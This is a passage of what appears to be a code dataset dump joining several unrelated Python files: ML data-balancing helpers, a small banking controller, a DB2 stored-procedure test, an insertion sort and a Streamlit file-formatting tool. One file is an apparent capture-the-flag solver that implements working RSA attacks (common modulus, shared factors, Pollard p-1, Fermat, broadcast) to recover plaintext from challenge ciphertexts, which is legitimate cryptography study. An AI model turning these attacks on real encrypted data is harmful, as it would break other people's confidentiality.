\\n\", len(self.x_train))\n\n number_pos_x = self.y_train.loc[self.y_train[\"Local Relapse Y(1) /N(0)\"] == 1]\n print(\"number positive responses y_train:\\n\", len(number_pos_x))\n\n\ndef _SMOTETomek(self):\n \"\"\"Tomek links can be used as an under-sampling method or as a data cleaning 
method.\n Tomek links to the over-sampled training set as a data cleaning method.\n Thus, instead of removing only the majority class examples that form Tomek links, examples from both classes are removed\"\"\"\n smt = SMOTETomek(random_state=self.seed)\n self.X_train_smote, self.y_train_smote = smt.fit_sample(self.x_train, self.y_train)\n print(\"X_train_SMOTE:\\n\", self.X_train_smote[1])\n\n self.x_train = pd.DataFrame(self.X_train_smote, columns=self.x_train.columns)\n self.y_train = pd.DataFrame(\n self.y_train_smote, columns=[\"Local Relapse Y(1) /N(0)\"]\n )\n\n print(\"len smote: \\n\", len(self.X_train_smote))\n print(\"len new x_train: \\n\", len(self.x_train))\n\n number_pos_x = self.y_train.loc[self.y_train[\"Local Relapse Y(1) /N(0)\"] == 1]\n print(\"number positive responses y_train:\\n\", len(number_pos_x))\n\n\ndef _ANASYN(self):\n \"\"\"ADAptive SYNthetic (ADASYN) is based on the idea of\n adaptively generating minority data samples according to their distributions using K nearest neighbor.\n The algorithm adaptively updates the distribution and\n there are no assumptions made for the underlying distribution of the data.\"\"\"\n print(\"before: \", len(self.x_train))\n resampler = uns.InstanceHardnessThreshold(\n sampling_strategy=0.2, random_state=self.seed\n )\n self.X_train_smote2, self.y_train_smote2 = resampler.fit_resample(\n self.x_train, self.y_train\n )\n self.x_train = pd.DataFrame(self.X_train_smote2, columns=self.x_train.columns)\n self.y_train = pd.DataFrame(\n self.y_train_smote2, columns=[\"Local Relapse Y(1) /N(0)\"]\n )\n print(\"after: \", len(self.x_train))\n\n adasyn = ADASYN(random_state=self.seed)\n self.X_train_smote, self.y_train_smote = adasyn.fit_sample(\n self.x_train, self.y_train\n )\n print(\"X_train_SMOTE:\\n\", self.X_train_smote[1])\n\n self.x_train = pd.DataFrame(self.X_train_smote, columns=self.x_train.columns)\n self.y_train = pd.DataFrame(\n self.y_train_smote, columns=[\"Local Relapse Y(1) /N(0)\"]\n )\n\n print(\"len smote: \\n\", len(self.X_train_smote))\n print(\"len new x_train: \\n\", len(self.x_train))\n\n number_pos_x = self.y_train.loc[self.y_train[\"Local Relapse Y(1) /N(0)\"] == 1]\n print(\"number positive responses y_train:\\n\", len(number_pos_x))\n\n\n### Feature Selectors\n\n\ndef select_KBest(self, score_func=f_regression, k=10):\n\n print(\"Pre feature selection shape X_Train\", self.x_train.shape)\n print(\"Pre feature selection shape Y_Train\", self.y_train.shape)\n feat_selector = SelectKBest(score_func=score_func, k=k)\n selector = feat_selector.fit(\n np.asarray(self.x_train), np.asarray(self.y_train.values)\n )\n\n # feat_scores = pd.DataFrame()\n self.feat_scores[\"Score\"] = selector.scores_\n self.feat_scores[\"Pvalue\"] = selector.pvalues_\n self.feat_scores[\"Support\"] = selector.get_support()\n self.feat_scores[\"Attribute\"] = self.x_train.columns\n\n self.feat_scores = self.feat_scores.sort_values(\"Score\", ascending=False, axis=0)\n # print(sorted_df)\n self.feat_scores = self.feat_scores.iloc[\n :k, :\n ] # get selected number of rows from ranking\n sorted_columns = self.feat_scores[\"Attribute\"].values # get column names\n\n print(\"Ranked input features:\\n\", self.feat_scores)\n\n # self.new_df = self.df[sorted_columns] #create new DF with selected rows - created in def __init__()\n # self.new_df[target] = self.df[target].values # add 'Response' column to new dataframe\n # print(\"New DataFrame Columns:\\n\", self.new_df.columns)\n # print('Length of new_df: \\n', len(self.new_df))\n # 
print(self.new_df.dtypes)\n\n self.x_train = self.x_train[sorted_columns]\n self.x_test = self.x_test[sorted_columns]\n\n print(\"New Columns:\\n\", self.x_train.columns)\n # print(\"New x_test Columns:\\n\", self.x_train.columns)\n\n print(\"Length of x_train: \\n\", len(self.x_train))\n print(\"Length of x_test: \\n\", len(self.x_test))\n\n\ndef boruta_selection(x_train, y_train, seed):\n \"\"\"Kursa, M., Rudnicki, W., “Feature Selection\n with the Boruta Package” Journal of Statistical Software, Vol.36, Issue 11, Sep 2010\"\"\"\n\n # define random forest classifier, with utilising all cores and\n # sampling in proportion to y labels\n rf = RandomForestRegressor(n_jobs=-1, oob_score=True)\n\n feat_selector = BorutaPy(\n rf,\n n_estimators=\"auto\",\n max_iter=100,\n alpha=0.05,\n verbose=2,\n random_state=seed,\n )\n\n # find all relevant features - 5 features should be selected\n # print(self.x_train.head())\n # print(self.y_train.head())\n selector = feat_selector.fit(np.asarray(x_train), np.asarray(y_train))\n # print(\"selector\", selector)\n # print(selector.support_)\n # print(selector.ranking_)\n # self.x_train = self.x_train.loc[:, feat_selector.support_].astype(\"float\")\n # self.x_test = self.x_test.loc[:, feat_selector.support_].astype(\"float\")\n\n # self.features[target] = self.y_train['Response']\n # print(\"New DF Shape: \", self.x_train.shape)\n # print(self.x_train)\n # self.x_train = self.features\n # print(\"New DataFrame Columns:\\n\", self.x_train.columns)\n # print('Length of new_df: \\n', len(self.x_train))\n # print(self.x_train.dtypes)\n return selector.support_\n\n\ndef _ADABoost(self):\n\n boost = AdaBoostRegressor(\n base_estimator=None,\n learning_rate=0.05,\n loss=\"square\",\n n_estimators=50,\n random_state=self.seed,\n )\n\n boost.fit(self.x_train, self.y_train)\n\n # Use the forest's predict method on the test data\n predictions = boost.predict(self.x_test)\n # Calculate the absolute errors\n errors = abs(predictions - self.y_test)\n # Print out the mean absolute error (mae)\n print(\"Mean Absolute Error:\", round(np.mean(errors), 2))\n\n\ndef scale_floats(df):\n # hacky way to get all columns that contain only floats\n tmp_cols = [key for key, value in df.dtypes.items() if value.kind == \"f\"]\n tmp_df = df[tmp_cols]\n scaler = MinMaxScaler()\n df[tmp_cols] = scaler.fit_transform(tmp_df)\n return df\n\n\ndef scale_y(s):\n scaler = MinMaxScaler()\n return scaler.fit_transform(s)","repo_name":"mariusloewe/master_thesis","sub_path":"src/helper/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13154811547","text":"from bitcoincoin.models.bank import Bank, BankUser, BankJoinDemand\n\n\ndef get_banks():\n banks = Bank.select()\n return [bank.get_small_data() for bank in banks]\n\n\ndef get_bank(bank_id, user_id=None):\n bank = Bank.get_or_none(id=bank_id)\n if bank is not None:\n data = bank.get_data()\n if user_id is not None:\n user = BankUser.get_or_none(bank=bank, user=user_id)\n if user is not None and user.rank == 'Admin':\n data['demands'] = [bjd.get_small_data() for bjd in bank.demands]\n return data\n\n\ndef create_bank(name: str, symbol: str, admin: int):\n bank = Bank.create(name=name, symbol=symbol)\n admin_user = BankUser.create(bank=bank, user=admin, rank='Admin')\n return bank.get_data()\n\n\ndef join_bank(bank_id: int, user_id: int, rank: str):\n bank = Bank.get(id=bank_id)\n join_demand = 
BankJoinDemand.get_or_none(bank=bank, user_id=user_id)\n user = BankUser.create(bank=bank, user=user_id, rank=rank)\n join_demand.delete_instance()\n\n return bank.get_data()\n\n\ndef quit_bank(bank_id: int, user_id: int):\n user = BankUser.get_or_none(bank=bank_id, user=user_id)\n if user is None:\n return False\n\n user.delete_instance()\n return True\n\n\ndef ask_to_join_bank(bank_id: int, user_id: int):\n bank = Bank.get(id=bank_id)\n join_demand, created = BankJoinDemand.get_or_create(bank=bank, user=user_id)\n return created\n","repo_name":"fuegoio/bitcoincoin","sub_path":"back/bitcoincoin/controllers/banks.py","file_name":"banks.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"13884783331","text":"\"\"\"test SP Iterator\r\n \r\n\"\"\"\r\nfrom __future__ import absolute_import\r\n\r\nimport sys\r\nimport ibm_db\r\n\r\nfrom . import CommonTestCase\r\nfrom utils.logconfig import mylog\r\nfrom multiprocessing import Value\r\nfrom ctypes import c_bool\r\n\r\nexecute_once = Value(c_bool,False)\r\n\r\n__all__ = ['Iterator']\r\nclass Iterator(CommonTestCase):\r\n \"\"\"Iterator\"\"\"\r\n\r\n def __init__(self, test_name, extra_arg=None):\r\n super(Iterator, self).__init__(test_name, extra_arg)\r\n\r\n def runTest(self):\r\n super(Iterator, self).runTest()\r\n if self.mDb2_Cli is None:\r\n return\r\n with execute_once.get_lock():\r\n if execute_once.value:\r\n mylog.debug(\"we already ran\")\r\n return\r\n execute_once.value = True\r\n self.test_register_iterator()\r\n self.test_run_iterator()\r\n\r\n def test_register_iterator(self):\r\n \"\"\"SET SERVEROUTPUT ON@\r\n\r\n \"\"\"\r\n sql_str = \"\"\"\r\nCREATE OR REPLACE PROCEDURE ITERATOR()\r\n LANGUAGE SQL\r\n BEGIN\r\n DECLARE v_deptno CHAR(3); \r\n DECLARE v_new_dept CHAR(3);\r\n DECLARE v_deptname VARCHAR(29); \r\n DECLARE v_admdept CHAR(3);\r\n DECLARE v_one_char CHAR(1);\r\n DECLARE v_99 CHAR(2);\r\n DECLARE at_end INTEGER DEFAULT 0;\r\n DECLARE not_found CONDITION FOR SQLSTATE '02000';\r\n\r\n DECLARE c1 CURSOR FOR \r\n SELECT \r\n deptno, \r\n deptname,\r\n admrdept\r\n FROM \r\n department \r\n ORDER BY \r\n deptno;\r\n DECLARE CONTINUE HANDLER \r\n FOR \r\n not_found \r\n SET \r\n at_end = 1;\r\n\r\n OPEN c1;\r\n\r\n ins_loop: LOOP\r\n\r\n FETCH c1 INTO v_deptno, v_deptname, v_admdept; \r\n\r\n IF at_end = 1 THEN\r\n LEAVE ins_loop;\r\n ELSEIF v_deptno = 'D11' THEN\r\n ITERATE ins_loop;\r\n END IF;\r\n set v_one_char= CHR(MOD(INT(RAND()*100),26)+65);\r\n set v_99 = CAST(MOD(INTEGER(RAND()*10000), 99) as VARCHAR(2));\r\n set v_new_dept = CONCAT(v_one_char, v_99);\r\n CALL DBMS_OUTPUT.PUT_LINE(v_new_dept);\r\n IF v_one_char = 'A' THEN\r\n INSERT INTO \r\n department (deptno, deptname, admrdept, location) \r\n VALUES \r\n (v_new_dept, v_deptname, v_admdept, 'LA CALLE');\r\n END IF;\r\n\r\n END LOOP;\r\n\r\n CLOSE c1;\r\nEND\r\n@\r\n\r\n\r\n\"\"\".format(schema=self.getDB2_USER())\r\n if not self.if_table_present(self.conn, \"DEPARTMENT\", self.getDB2_USER()):\r\n mylog.warning(\"\"\"\r\nTable \"%s\".DEPARTMENT is not present, so we can't register sp ITERATOR, which depends on table DEPARTMENT\r\n\"\"\" % self.getDB2_USER())\r\n self.result.addSkip(self, \"Table DEPARTMENT is not present, so we can't register sp ITERATOR\")\r\n return 0\r\n ret = self.run_statement(sql_str)\r\n return ret\r\n\r\n def test_run_iterator(self):\r\n \"\"\"Test iterator\r\n \"\"\"\r\n if not self.if_routine_present(self.getDB2_USER(), \"ITERATOR\"):\r\n 
mylog.warning(\"ITERATOR sp is not present\")\r\n self.result.addSkip(self, \"ITERATOR sp is not present\")\r\n return 0\r\n try:\r\n stmt = ibm_db.callproc(self.conn, \"ITERATOR\" , ()) \r\n ibm_db.free_stmt(stmt)\r\n except Exception as e:\r\n self.result.addFailure(self, sys.exc_info()) \r\n return -1\r\n return 0\r\n","repo_name":"asierra01/ibm_db_test","sub_path":"ibm_db_test_cases/ibm_db_sp_iterator.py","file_name":"ibm_db_sp_iterator.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37506031056","text":"from Crypto.Util.number import getPrime , long_to_bytes,bytes_to_long\nfrom gmpy2 import invert , powmod , is_prime , gcd , next_prime , iroot\nfrom functools import reduce\nn = []\ne = []\nc = []\nm = {}\nsolved = []\n\ndef CRT(mi, ai):\n M = reduce(lambda x, y: x * y, mi)\n ai_ti_Mi = [a * (M // m) * invert(M // m, m) for (m, a) in zip(mi, ai)]\n return reduce(lambda x, y: x + y, ai_ti_Mi) % M\ndef small_e_boardcast_attack(nlist , e , clist):\n m = CRT(nlist , clist)\n tmp = iroot(m , e)\n if tmp[1] == 1:\n return tmp[0]\n else:\n return 0\n\ndef same_module_attack(N , e1 , e2 , c1 , c2):\n d1 = invert(e1 , e2)\n d2 = (d1 * e1 - 1) // e2\n true_c2 = invert(c2 , N)\n return (powmod(c1 , d1 , N) * powmod(true_c2 , d2 , N)) % N\ndef Pollard_p_1(N):\n a = 2\n f = a\n # precompute\n while 1:\n for n in range(1,200000):\n f = powmod(f, n, N)\n if is_prime(n):\n d = gcd(f-1, N)\n if 1 < d < N:\n return d , N//d\n elif d >= N:\n f = next_prime(a)\n break\n else:\n break\ndef Williams_p_1(N):\n def myplus(a , b , difference):\n return (a * b - difference) % N\n def myAverange(high, low ,difference):\n return ((low + high) * invert(difference , N)) % N\n def mymul(num , vn):\n num_bin = bin(num)[2:]\n lenth = len(num_bin)\n two_list = [vn]\n for i in range(lenth):\n temp = two_list[-1]\n two_list.append(myplus(temp , temp , 2))\n two_list.reverse()\n low = two_list[1]\n high = two_list[0]\n for i in range(1 , len(num_bin)):\n temp = myAverange(high , low , two_list[i+1])\n if num_bin[i] == '1':\n low = temp\n else:\n high = temp\n return low\n i = 2\n v = 15\n while 1:\n v = mymul(i , v)\n temp = gcd(v-2 , N)\n if 1 < temp < N:\n return temp , N // temp\n elif temp == N:\n return 0\n else:\n i += 1 \n if i > 100000:\n return 0\n\ndef _GetPlain(c):\n tmp = hex(c)[2:]\n if tmp[:16] != '9876543210abcdef':\n return 0\n number = int(tmp[16:24],16)\n plain = long_to_bytes(int(tmp[-16:] , 16))\n m[number] = plain\n return 1\ndef GetPlain(p , q , e , c):\n phi = (p-1)*(q-1)\n d = invert(e , phi)\n m = powmod(c , d , p*q)\n return _GetPlain(m)\n\ndef detect1():\n for i in range(21):\n for j in range(21):\n if i != j and n[i] == n[j] and e[i] != e[j]:\n tmp = _GetPlain(same_module_attack(n[i] , e[i],e[j],c[i],c[j]))\n if tmp == 1:\n solved.append(i)\n solved.append(j)\ndef detect2():\n for i in range(21):\n for j in range(21):\n if i != j:\n if 1 < gcd(n[i] , n[j]) < n[i]:\n p = gcd(n[i] , n[j])\n q1 = n[i] // p\n q2 = n[j] // p\n tmp1 = GetPlain(p , q1 , e[i],c[i])\n tmp2 = GetPlain(p , q2 , e[j],c[j])\n if tmp1 ==1:\n solved.append(i)\n if tmp2 == 1:\n solved.append(j)\n\ndef detect3():\n for i in range(21):\n if i not in solved:\n tmp = Pollard_p_1(n[i])\n if isinstance(tmp , tuple):\n p , q = tmp\n if GetPlain(p,q,e[i],c[i]):\n solved.append(i)\n\ndef detect4():\n for i in range(21):\n if i not in solved:\n p_q = iroot(n[i] , 2)[0]\n for _ in range(20000):\n p_q += 1\n if iroot(p_q**2 - 
n[i],2)[1] == 1:\n tmp = iroot(p_q**2 - n[i],2)[0]\n p = (p_q + tmp)\n q = (p_q - tmp)\n if GetPlain(p , q , e[i] , c[i]):\n solved.append(i)\n \ndef detect5():\n e = 5\n num = [3,8,12,16,20]\n nlist = [n[i] for i in num]\n clist = [c[i] for i in num]\n m = small_e_boardcast_attack(nlist , e ,clist)\n if _GetPlain(m):\n for i in num:\n solved.append(i)\ndef detect6():\n for i in range(21):\n if i not in solved:\n tmp = Williams_p_1(n[i])\n if isinstance(tmp , tuple):\n p , q = tmp\n if GetPlain(p,q,e[i],c[i]):\n solved.append(i)\n\n\n\nname = ['./data/Frame' + str(i) for i in range(21)]\nfor i in range(21):\n f = open(name[i] , 'r')\n data = f.read()\n tn , te , tc = int(data[:256] , 16) , int(data[256:512] , 16) , int(data[512:] , 16)\n n.append(tn)\n e.append(te)\n c.append(tc)\nnlist = []\nclist = []\nfor i in range(21):\n if e[i] == 3:\n nlist.append(n[i])\n clist.append(c[i])\n\ndetect1()#same module\ndetect2()#gcd attack\ndetect3()#pollard p-1\ndetect4()#Fermat attack\ndetect5()#broadcast attack\n#detect6()#william p+1\n\n\nm[2] = b'amous sa'\nm[3] = b'ying of '\nm[4] = b'Albert E'\n#coppersmith in e3.sage\n\nplain = b''\nprint(m)\nfor i in range(21):\n if i in m :\n plain += m[i]\n else:\n plain += b' '*8\nprint(plain)","repo_name":"Cor1e/Cryptography_task","sub_path":"task3/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18859521446","text":"def insertionSort(arr):\n for i in range(1,len(arr)):\n j=i-1\n temp=arr[i]\n while j>=0 and arr[j]>temp:\n arr[j+1]=arr[j]\n j-=1\n\n arr[j+1]=temp\n\nprint(\"Enter the elements of the list separated by spaces\")\narr=[int(x) for x in input().split()]\ninsertionSort(arr)\nprint(\"Sorted List - \",arr)\n","repo_name":"DSC-ChitkaraUniv/HacktoberFest-2020","sub_path":"Coding/Python/insertionSort.py","file_name":"insertionSort.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"33288565670","text":"class DestinoCulinarioView:\n def __init__(self, controller):\n self.controller = controller\n\n def crear_destino_culinario(self):\n id = int(input('Ingrese el ID del destino culinario: '))\n nombre = input('Ingrese el nombre del destino culinario: ')\n tipo_cocina = input('Ingrese el tipo de cocina: ')\n ingredientes = input('Ingrese los ingredientes (separados por comas): ').split(',')\n precio_minimo = float(input('Ingrese el precio mínimo: '))\n precio_maximo = float(input('Ingrese el precio máximo: '))\n popularidad = input('Ingrese la popularidad: ')\n disponibilidad = bool(input('Ingrese la disponibilidad (True/False): '))\n imagen = input('Ingrese la URL de la imagen: ')\n coord = input('Ingrese las coordenadas: ')\n direccion = input('Ingrese la dirección: ')\n\n self.controller.crear_item(id, nombre, tipo_cocina, ingredientes)\n print(f'Destino culinario creado con éxito.')\n\n def ver_destinos_culinarios(self):\n destinos_culinarios = self.controller.ver_items()\n for destino in destinos_culinarios:\n print(f\"ID: {destino['id']}, Nombre: {destino['nombre']}, Tipo de cocina: {destino['tipo_cocina']}\")\n\n def ver_destino_culinario_id(self, id_destino):\n return self.controller.ver_items_id(id_destino)\n\n def eliminar_destino_culinario(self):\n id_destino = int(input('Ingrese el ID del destino culinario que desea eliminar: '))\n self.controller.eliminar_item_id(id_destino)\n print('Destino culinario 
eliminado con éxito.')\n","repo_name":"carlos8788/FoodTravel","sub_path":"view/destino_culinario_view.py","file_name":"destino_culinario_view.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12218715754","text":"import streamlit as st\nimport pandas as pd\nimport base64\nimport datetime\nimport re\nimport io\nimport numpy as np\nimport time\nimport os\nimport csv\n\n\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium import webdriver\nfrom selenium.webdriver import FirefoxOptions\n\ndef download_file(sql_file):\n return st.download_button(\n label=\"DOWNLOAD!\",\n data=sql_file,\n file_name=sql_file.name.replace('.sql','_replaced.sql'),\n mime=\"text/plain\"\n )\ndef format_csv(df1,df_tp):\n # Perform some action to format the CSV file\n # For example, sort the dataframe by a specific column\n cols = df1.columns\n if 'Customer Name' in cols:\n df_tp['*ContactName'] = df1['Customer Name']\n else:\n st.write(f'Missing Customer Name')\n if not 'PO Number' in cols:\n # df_tp['InventoryItemCode'] = df1['PO Number']\n # else:\n st.write(f'Missing PO Number')\n if 'Primary Contact EmailID' in cols:\n df_tp['EmailAddress'] = df1['Primary Contact EmailID']\n else:\n st.write(f'Missing Primary Contact EmailID')\n \n if 'Billing Address' in cols:\n df_tp['Billing Address'] = df1['Billing Address']\n else:\n st.write(f'Missing Billing Address')\n if 'Billing City' in cols:\n df_tp['POCity'] = df1['Billing City']\n else:\n st.write(f'Missing Billing City')\n if 'Billing Country' in cols:\n df_tp['POCountry'] = df1['Billing Country']\n else:\n st.write(f'Missing Billing Country')\n if 'Invoice Number' in cols:\n # df_tp['*InvoiceNumber'] = df1.apply(lambda x: '# ' + x['Invoice Number'] if '#' not in x['Invoice Number'] else x['Invoice Number'], axis=1)\n df_tp['*InvoiceNumber'] = df1['Invoice Number']\n else:\n st.write(f'Missing Invoice Number')\n if 'CF.TGM #' in cols:\n df_tp['Reference'] = df1['CF.TGM #']\n else:\n st.write(f'Missing Reference')\n if 'Invoice Date' in cols:\n \n df_tp['*InvoiceDate'] = df1['Invoice Date']\n else:\n st.write(f'Missing Invoice Date')\n if 'Expected Payment Date' in cols:\n df_tp['*DueDate'] = df1['Expected Payment Date']\n else:\n st.write(f'Missing Expected Payment Date')\n if 'Total' in cols:\n df_tp['Total'] = df1['Total']\n else:\n st.write(f'Missing Total')\n if 'Item Desc' in cols:\n # df_tp['*Description'] = df1['Item Desc']\n df_tp['*Description'] = df1.apply(lambda x: x['Item Desc'] + '\\nPurchase Order: ' + str(x['PO Number']) if x['PO Number'] not in ['',np.nan] else x['Item Desc'],axis=1)\n # df_tp['*Description'] = df1['Item Desc'] + '\\nPurchase Order: ' + df1['PO Number']\n else:\n st.write(f'Missing Item Desc')\n if 'Quantity' in cols:\n df_tp['*Quantity'] = df1['Quantity']\n else:\n st.write(f'Missing Quantity')\n if 'Item Price' in cols:\n df_tp['*UnitAmount'] = df1['Item Price']\n else:\n st.write(f'Missing Item Price')\n if 'Discount' in cols:\n df_tp['Discount'] = df1['Discount']\n else:\n st.write(f'Missing Discount')\n 
if 'Account Code' in cols:\n df_tp['*AccountCode'] = df1['Account Code']\n else:\n st.write(f'Missing Account Code')\n if 'Item Tax Type' in cols:\n df_tp['*TaxType'] = df1['Item Tax Type']\n else:\n st.write(f'Missing Item Tax Type')\n df_tp['TaxAmount'] = 0\n if 'Currency Code' in cols:\n df_tp['Currency'] = df1['Currency Code']\n else:\n st.write(f'Missing Currency Code')\n # indexes = df_tp[df_tp['*InvoiceNumber'].duplicated()].index\n # count=0\n # for i in indexes:\n # new_text = str(df_tp['*InvoiceNumber'][i])+ '-'+ str(count)\n # df_tp.at[i,'*InvoiceNumber'] = new_text\n # count+=1\n \n return df_tp\ndef format_csv_contact(df_old,df_new):\n\n df_new['*ContactName'] = df_old['Contact Name']\n df_new['EmailAddress'] = df_old['EmailID']\n df_new['FirstName'] = df_old['First Name']\n df_new['LastName'] = df_old['Last Name']\n df_new['POAttentionTo'] = df_old['Billing Attention']\n df_new['POAddressLine1'] = df_old['Billing Address']\n df_new['POAddressLine2'] = df_old['Billing Street2']\n df_new['POCity'] = df_old['Billing City']\n df_new['POPostalCode'] = df_old['Billing Code']\n df_new['POCountry'] = df_old['Billing Country']\n df_new['PhoneNumber'] = df_old['Billing Phone']\n df_new['FaxNumber'] = df_old['Billing Fax']\n df_new['MobileNumber'] = df_old['MobilePhone']\n df_new['SkypeName'] = df_old['Skype Identity']\n df_new['TaxNumber'] = df_old['Tax Percentage']\n df_new = df_new.drop_duplicates(subset='*ContactName',keep=\"first\")\n return df_new\n\ndef format_excel(df):\n deal_created_count = 0\n deal_closed_count = 0\n for i in df.columns:\n my_series = df[i].dropna().to_list()\n if len(my_series)>0 and re.search('\\d\\d\\d\\d-\\d\\d-\\d\\d',str(my_series[0])) is not None:\n \n df[i] = pd.to_datetime(df[i],format='%Y/%m/%d',errors='coerce',yearfirst=True)\n if i == 'Deal - Deal created':\n deal_created_count+=1\n df['Created_month'] = df[i].astype('datetime64[ns]').dt.strftime('%m/%Y')\n df['Created_quater'] = df[i].astype('datetime64[ns]').dt.to_period('Q').dt.strftime('Q%q/%y')\n\n elif i == 'Deal - Deal closed on':\n deal_closed_count+=1\n df['Closed_month'] = df[i].astype('datetime64[ns]').dt.strftime('%m/%Y')\n df['Closed_quater'] = df[i].astype('datetime64[ns]').dt.to_period('Q').dt.strftime('Q%q/%y')\n\n df[i] = pd.to_datetime(df[i], format='%Y/%m/%d',errors='ignore').dt.date\n if deal_created_count==0:\n st.write(\"Couldn't find the column 'Deal - Deal created'\")\n elif deal_closed_count==0:\n st.write(\"Couldn't find the column 'Deal - Deal closed on'\")\n return df\n\ndef download_csv(df):\n # Create a downloadable link for the formatted CSV\n csv = df.to_csv(index=False)\n b64 = base64.b64encode(csv.encode()).decode()\n href = f'<a href=\"data:file/csv;base64,{b64}\" download=\"data_formatted.csv\">Download Formatted CSV File</a>'\n st.markdown(href, unsafe_allow_html=True)\n\ndef download_excel(dataframe):\n # Convert the pandas DataFrame to an Excel file\n excel_file = io.BytesIO()\n with pd.ExcelWriter(excel_file, mode='xlsx', engine='openpyxl') as writer:\n dataframe.to_excel(writer, index=False)\n excel_file.seek(0)\n \n # Set the file name and type\n file_name = 'data_formatted.xlsx'\n file_type = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'\n \n # Create a button to download the file\n download_button_str = f\"Click here to download {file_name}!\"\n download_button = st.download_button(label=download_button_str, data=excel_file, file_name=file_name, mime=file_type)\n \n # Display the button\n st.write(download_button)\n\ndef set_bg_hack_url():\n '''\n A function to unpack an image from a URL and set it as the background.\n 
Returns\n -------\n The background.\n '''\n \n st.markdown(\n f\"\"\"\n \n \"\"\",\n unsafe_allow_html=True\n )\ndef main():\n # set_bg_hack_url()\n st.image('https://vcdn1-giaitri.vnecdn.net/2023/05/18/deppcannes-1684376950-16843769-7808-2139-1684377768.jpg?w=500&h=300&q=100&dpr=2&fit=crop&s=LLzHRXv7WX6Rw8c-5je0Lg',caption=\"THANK YOU FOR YOUR SERVICE MR TAN\")\n \n\n tab1,tab2,tab3,tab4 = st.tabs([\"CSV Formatter - Invoices\",\"CSV Formatter - Contacts\",\"Excel Date Formatter\",\"DB Replacer\"])\n with tab1:\n st.title(\"CSV Formatter - Invoices\")\n # Upload CSV file\n uploaded_file = st.file_uploader(\"Upload CSV - invoice file\", type=\"csv\")\n uploaded_template = st.file_uploader(\"Upload CSV template - invoice file\", type=\"csv\")\n\n if uploaded_template is not None:\n template_df = pd.read_csv(uploaded_template,header=0)\n if uploaded_file is not None:\n df_file = pd.read_csv(uploaded_file,header=0)\n # Format button\n if st.button(\"Format\"):\n formatted_df = format_csv(df_file,template_df)\n\n # Display the formatted dataframe\n st.dataframe(formatted_df)\n\n # Download formatted CSV button\n download_csv(formatted_df)\n with tab2:\n st.title(\"CSV Formatter - Contacts\")\n # Upload CSV file\n uploaded_file2 = st.file_uploader(\"Upload CSV file - contact\", type=\"csv\")\n uploaded_template2 = st.file_uploader(\"Upload CSV template - contact file\", type=\"csv\")\n\n if uploaded_template2 is not None:\n template_df2 = pd.read_csv(uploaded_template2,header=0)\n if uploaded_file2 is not None:\n df_file2 = pd.read_csv(uploaded_file2,header=0)\n # Format button\n if st.button(\"Format\"):\n formatted_df2 = format_csv_contact(df_file2,template_df2)\n\n # Display the formatted dataframe\n st.dataframe(formatted_df2)\n\n # Download formatted CSV button\n download_csv(formatted_df2)\n with tab3:\n st.title(\"Excel Date Formatter\")\n uploaded_file1 = st.file_uploader(\"Upload Excel file\", type=\"xlsx\")\n if uploaded_file1 is not None:\n uploaded_file1_df = pd.read_excel(uploaded_file1,header=0)\n if st.button(\"Format\"):\n formatted_df1 = format_excel(uploaded_file1_df)\n\n # Display the formatted dataframe\n st.write(formatted_df1)\n\n # Download formatted CSV button\n download_excel(formatted_df1)\n with tab4:\n st.title(\"DB Replacer\")\n # Upload CSV file\n sql_file = st.file_uploader(\"Upload DB file\", type=\"sql\")\n uploaded_excel = st.file_uploader(\"Upload excel data\", type=\"xlsx\")\n \n if uploaded_excel is not None:\n try:\n excel = pd.read_excel(uploaded_excel,header=0,sheet_name='Sheet1')\n except:\n st.write('Please put data into sheet name \"Sheet1\" and try again.')\n if sql_file is not None:\n # with open(sql_file,'r') as file:\n sql_str = sql_file.read().decode('utf-8')\n # Format button\n if st.button(\"Format\"):\n progress_text = \"Replacing is in progress. 
Please wait.\"\n my_bar = st.progress(0.0, text=progress_text)\n start_time = time.time()\n new_excel = pd.melt(excel,id_vars = 'Alias',var_name='Find',value_name='Replace')\n new_excel['Alias'] = new_excel['Alias'].str.lower().str.replace('(','').str.replace(')','').str.replace(' ','-')\n new_excel = new_excel.sort_values(\"Alias\")\n df = new_excel.copy()\n df = df.reset_index(drop=True)\n df_report = df.copy()\n df_report['Status'] = ''\n status_text = st.empty()\n for index, row in df.iterrows():\n time.sleep(0.05)\n my_bar.progress((index+1)/len(df), text=progress_text)\n \n find = str(row['Find']).strip()\n replace = str(row['Replace']).replace('percent','%').strip()\n replace = replace.replace(\"'\",r\"\\'\").replace(\"\\n\",\"\").replace(\"\\r\",\"\")\n # replace = replace.replace(\"'\",r\"\\'\").replace(\"/\",r\"\\/\").replace(\"/\",r\"\\/\").replace(\"\\n\",\"\").replace(\"\\r\",\"\")\n if find == 'abc,def' and not replace == '-':\n replace = f'{int(replace):,}'\n dump = find.replace('$','\\$').replace('(','\\(').replace(')','\\)').replace('\\\\', r'\\\\').replace('\\/', r'/')\n alias = row['Alias'].strip()\n # if index%100==0:\n status_text.write(f'{index+1}/{len(df)}')\n # for i in range(2):\n result = re.subn(fr\"(?<={alias}).+{dump}(?=[^a-zA-Z])\",lambda x: x.group().replace(find,replace),sql_str)\n if not result[1]==0:\n \n sql_str = result[0]\n df_report.at[index,'Status'] = 'Sucess'\n else:\n df_report.at[index,'Status'] = 'Counld not find'\n time.sleep(1)\n 